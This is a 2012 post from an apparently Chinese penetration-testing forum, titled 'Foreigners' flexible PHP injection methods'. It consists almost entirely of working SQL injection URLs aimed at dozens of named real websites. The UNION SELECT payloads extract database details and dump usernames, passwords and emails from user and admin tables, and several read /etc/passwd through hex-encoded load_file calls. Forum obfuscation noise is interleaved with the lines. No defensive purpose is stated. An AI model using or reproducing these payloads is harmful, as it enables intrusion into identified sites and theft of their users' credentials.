中国网络渗透测试联盟

标题: 老外php灵活注入方法 [打印本页]
作者: admin    时间: 2012-9-15 14:43
标题: 老外php灵活注入方法
灵活的php注入+活的实例演示! 老外那里挖的
9 }) `- @5 b! D" i  }& p8 F' \) u* v: y, i: |( X: w, p+ D. R- _
http://www.ihrc.org.uk/show.php?id=-99+UNION+ALL+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13-- ( c5 }6 _3 x- d! X
http://www.witchcraft.nu/newsitem.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10-- 4 H0 i- m/ g7 E/ B
http://ccsmi.fas.sfu.ca/newsItem.php?id=-99+UNION+ALL+SELECT+1,2,3,version(),5,6,7,8-- ) Z( h1 m9 {7 c/ J& L
http://www.senesco.com/newsitem.php?id=-99+UNION+ALL+SELECT+1,2,3,table_name,5%20from%20information_schema.tables%20where%20table_schema=database ()-- $ U0 J  L  L  Y* h# y5 u/ k
http://www.hpcalc.org/details.php?id=-99+UNION+ALL+SELECT+1,concat_ws(0x3a,id,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29+from+users--
) t: Q. @# p0 h5 h$ {) K0 J7 qhttp://www.atlmetal.com/bands/band.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14--
7 z, b" b' E1 W4 z6 Fhttp://www.rocklab.it/band.php?id=-99+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
) D# l9 x2 K- h( L) nhttp://www.bandlist24.de/band.php?id=-99+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
+ [0 M# w. g/ d! u, t1 Ehttp://www.listenuppresident.com ... +UNION+ALL+SELECT+1,2,3,4,5,6,concat_ws(0x3a,Name,Email,Password),8+from+Members%20limit%20 1,1-- $ l% p; X. b) ^3 [. R
http://www.hamdrams.co.uk/admin.php?id=-99+UNION+ALL+SELECT+1,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,10,11%20from%20phpbb_users-- 0 T6 B- X8 E9 W3 x& @4 q
http://www.correiagroup.com/agent.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12--
7 i" A  C! ]' {0 _% w* C3 p2 qhttp://www.eralincolnrealty.net/ ... +UNION+ALL+SELECT+1,2,3,column_name,5,6,7%20from%20information_schema.columns%20where%20table_nam e='Agent'%20limit%205,1--
3 M/ h7 ~% e/ k8 \" N6 Y  o* vhttp://www.estatesmall.com/real- ... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15--
7 N8 `$ T! ?6 _( h- T0 P; Qhttp://www.fourstarrealty.com/agent.php?id=-99+UNION+ALL+SELECT+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20admin-- . S4 ^. H% C, v0 T7 p6 U! \" ~, O
http://www.rpmre.com/arealsys/agent.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13-- ( }0 Z2 I- v+ {9 v
http://internet-shares.com/users.php?id=-99+UNION+ALL+SELECT+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+users%20limit%201,1-- & G# S3 Z7 K1 n
http://www.punkarchives.com/users.php?ID=-99+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password,Email),3,4,5,6+from+users--
7 j6 Q( J9 l* }$ u9 D: Y9 Mhttp://www.memfis.eu/ko7e7a/users.php?id=-99+UNION+ALL+SELECT+1,2,concat_ws(0x3a,nick,name,email,text),4,5,6,7+from+users-- 2 ~2 d- V4 [, b) E  m$ G. m" B5 {
http://www.listenuppresident.com ... +UNION+ALL+SELECT+1,2,3,4,5,6,concat_ws(0x3a,Name,Email,Password),8+from+Members%20limit%20 1,1-- # ], ]( Q& p3 {8 v
http://www.newportcoastbroker.co ... +UNION+ALL+SELECT+1,2,unhex(hex(load_file(0x2F6574632F706173737764)))%20from%20mysql.user--
8 y& Y1 b7 B5 p, v4 T, ?1 mhttp://www.gamesector.org/review.php?id=-83+UNION+ALL+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10--   x4 d& C# k0 k% _- D. D+ U
http://www.bgra.net/2004/review.php?id=-12+UNION+ALL+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26--
5 H) E5 F& c+ w3 c) Ihttp://www.btne.org/members.php?id=-6+UNION+ALL+SELECT+user(),database(),version()-- $ _2 `4 k: W: C4 ?' f" y
http://cormaci.com/pat.php?id=-2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10--
& v# [( \& ?7 I* A/ ^/ e: e& @2 Ohttp://www.punbb.fr/styles/style.php?id=-93+UNION+ALL+SELECT+1,0x4E65757472616C69736564,database(),4,5,null,7,8,9--
) I8 g: L1 ~$ Q: J, T4 Lhttp://www.punbb.fr/styles/style.php?id=-93+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password),database(),4,5,null,7,8,9+from+punbb_users+limit +1,1--
) M# b- b5 u! R3 Khttp://travalor.com/hunt.php?id=-3+UNION+ALL+SELECT+1,2,concat_ws(0x3a,username,password,email),4,5,6,7,8,9,10,11,12,13,14,15,16+from+users+limit +0,1-- 2 J5 O+ L  f. v3 |' x$ v
http://www.thefalesteam.com/sell.php?ID=-64+UNION+ALL+SELECT+1,2,3,4,5,6,unhex(hex(concat_ws(0x3a,version(),user(),database()))),8,9,10,11,12--
; ?+ V& z& k# U0 d% l" K$ _http://www.loffice.org/affiliate ... +UNION+ALL+SELECT+1,concat_ws(0x3a,nom,adresse,tel,mail,password),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,6 4,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+membre+limit+0,1--
' b4 N5 s% t4 w+ ?( xhttp://haasbuilders.com/auth.php?id=-39+UNION+ALL+SELECT+1,concat_ws(0x3a,project_id,project_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from +projects+where+project_id+=+36-- 5 ?& N( ^) x6 m1 T1 V5 n+ d
http://ocmusicfest09.com/artist/bio.php?id=-99+UNION+ALL+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user_name,password,password_hint),8,9,10,11,12,13+from +deleterec--
0 @8 x* n* T) ?0 u$ g( jhttp://www.theatreview.org.nz/re ... +UNION+ALL+SELECT+1,2,3,4,5,concat_ws(0x3a,username,email,password),7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+members+limit+0,1-- : F. a( B# g; x3 X9 c
http://www.thebartend.com/drinks ... +UNION+ALL+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--
( p" g! a) s( c( D. ^4 Q, k6 }8 |: Ehttp://turfwars2.com/user.php?id=-30+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users+limit+1,1-- 8 U! l( F0 D7 H0 u7 p* K
http://www.lingo.org.za/short.php?id=-40+UNION+ALL+SELECT+1,2,3,4,5,unhex(hex(password)),7,8,9+from+user--
: H& B% ~* t3 B% W: ~8 o- I0 S6 xhttp://www.lfks.org/halloffame.php?id=-15+UNION+ALL+SELECT+1,id,3,4,5,6,7+from+halloffame--
0 |, n2 b/ n( A+ r# ~7 z# N. {. X) Bhttp://www.spacefleetonline.com/ ... LL+SELECT+concat_ws(0x3a,user_name,real_name,email,address,password)+from+user+limit+0,1 --
. r9 r( \4 k; ~https://www.ncsy.ca/email.php?id=-7+UNION+ALL+SELECT+1,concat_ws(0x3a,version(),user(),database()),3--
9 f5 l4 w9 h. _' P/ chttp://www.beaufortbooks.com/books.php?id=-53+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password,email),3,4,5,6,7,8,9,10,11,12,13+from+users+lim it+0,1--
& Y! K6 k( l' `$ Q3 rhttp://www.andytimmons.com/video.php?id=-0003+UNION+ALL+SELECT+1,unhex(hex(concat_ws(0x3a,version(),user(),database()))),3,4,5,6,7,8-- ; X0 E! c# s+ A6 M% a% f  T( v
http://www.law-and-numbers.de/de ... +UNION+ALL+SELECT+1,null,3,null,0x4E65757472616C69736564,column_name,null,8,9+from+informatio n_schema.columns+limit+0,1--
% g! }: F& w, @# ]http://www.uwtuib.com/members.php?id=53+UNION+ALL+SELECT+1,2,concat_ws(0x3a,lname,password,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32+from+members+limit+0,1-- 0 t1 i1 q5 a  I! \) f  }8 s/ t6 ?
http://www.retailtherapy.tv/video.php?id=-163+UNION+ALL+SELECT+1,2,3,concat_ws(0x3a,id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+members--
0 a+ k1 w  A3 V+ F. l9 Ehttp://www.notbbc.co.uk/janet/ms ... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex(concat_ws(0x3a,version(),user(),d atabase()))),14,15,16--
; ?7 D3 _& h: Phttp://www.visitmaldives.com/FAQ/faq.php?Id=-4+UNION+ALL+SELECT+1,2,concat_ws(0x3a,username,password,email),4,5+from+users+limit+0,1--
: Y9 g2 U- {3 X& ?http://www.fair-media.info/reque ... ON+ALL+SELECT+unhex(hex(concat_ws(0x3a,version(),user(),database()))),2--
7 I1 K3 \/ t& }1 Zhttp://www.langsfordcenter.com/o ... +UNION+ALL+SELECT+1,2,concat_ws(0x3a,adminid,password)+from+admin_login+limit+2,1-- 9 i5 f2 M2 ^3 C3 o- c/ ]6 T5 ]$ o
http://supersport-ci.com/scan.php?id=-42+UNION+ALL+SELECT+1,2,3,4,concat_ws(0x3a,version(),database(),user())-- 5 f6 p  S9 }" J
http://www.thediamondworks.co.za ... +UNION+ALL+SELECT+1,2,version(),0x4E65757472616C69736564+from+admin-- % q/ O% Y! e1 G5 }3 n! e
http://www.nortec.no/stjordal/pc.php?id=-41+UNION+ALL+SELECT+1,2,table_name,4 from information_schema.tables where table_schema=database()--
5 `7 \9 V, i! ~  h$ Jhttp://www.webhoster4u.de/server ... +ALL+SELECT+version(),database()--
! I  N& x/ @! f- r8 g/ yhttp://ens.ewi.tudelft.nl/People ... +UNION+ALL+SELECT+1,2,3,4,5,table_name,7,8,9,10,11,12,13%20from%20information_schema.tables%20wher e%20table_schema=database()%20limit%200,1--
; _& ]* U5 L: xhttp://www.putridflowers.com/music.php?id=-17+UNION+ALL+SELECT+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
9 @4 B& g: ]/ }/ D1 a0 R7 }0 j, ehttps://shop.invictusnetworks.co ... +UNION+ALL+SELECT+1,database(),3,4,5,6,7,8,9,10,11,12--
1 ]6 f1 i/ D7 f+ F: [http://sandiegoscreensavers.com/ ... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,concat_ws(0x 3a,discount_type,discount_category,discount_currpct,discount_value,discount_active,discount_ref,discount_expiration),77,78,79,80,81,82,83,84,85,86,87, 88+from+discount-- $ S/ ~$ P- M5 h/ J8 M
http://www.schoolbytes.com/summary.php?id=-99+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+users-- 4 Z- q; c$ `9 z4 A; A$ M1 O
http://www.toprightcorner.com/bio.php?id=-99+UNION+ALL+SELECT+1,2,3,4,4--
" J2 h4 S# b& q0 }- Z  W, `+ qhttp://www.wang-li.com/art.php?id=-118+UNION+ALL+SELECT+1,2,load_file(0x2F6574632F706173737764),4-- , @5 v. r# S$ s+ b% m* T
http://www.twisterella.com/indie ... +UNION+ALL+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,0x4E65757472616C69736564,9,10, 11+from+users+limit+0,1-- 3 i+ K# s! P. H0 \
http://www.wan-t.cn/www/sec.php?id=-48+UNION+ALL+SELECT+1,2,3,4,5,6,7,0x4E65757472616C69736564-- ! t" Z/ Y8 j# ]: ?
http://www.womenastronomers.com/ ... N+ALL+SELECT+concat(username,0x3a,passwor d),2,3,4+from+users---3+UNION+ALL+SELECT+1,null,0x4E65757472616C69736564,4,concat_ws(0x3a,version(),user(),database())--
5 H# S4 b* v: Mhttp://www.fclarchives.org.nz/re ... N+ALL+SELECT+concat(username,0x3a,password),2,3,4+from+users--
7 M+ \5 c' E& yhttp://www.erdelyikopo.net/text/text.php?id=-5+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,email,username,password,level)+from+members+limit+ 0,1--
' L% t' q. B5 r& V4 ^$ a+ Jhttp://eng.chiptronic.com/text.php?id=-9+UNION+ALL+SELECT+1,2,3,4,5,6,column_name,8,9,10,11,12-- 7 L8 w3 ^3 u  T4 `
http://www.bitepublishing.co.uk/ ... +UNION+ALL+SELECT+1,concat_ws(0x3,user,pass,admin),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24+from+staff--
/ l* V. H$ ?5 X! N1 Whttp://www.drivers-download.com/ ... +UNION+ALL+SELECT+1,2,load_file(0x2F6574632F706173737764),4,5,6,7,8,9,10-- - |, I+ E$ j* q+ c' H( Y
http://www.consul.cc/email.php?id=-1068+UNION+ALL+SELECT+null,concat_ws(0x3a,email,password),3,4,5+from+Users+limit+3,1-- 3 K8 R5 K9 _  u, ]( v
http://www.f1latam.com/esp.php?id=-8+UNION+ALL+SELECT+1,0x4E65757472616C69736564,3,concat_ws(0x3a,version(),database(),user()),5,6-- 6 `4 M6 {  g; q, h  e
http://bia2.com/music-review/rev ... +UNION+ALL+SELECT+1,2,3,4,5,version(),7,8,9,10,11,12,13,14--



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2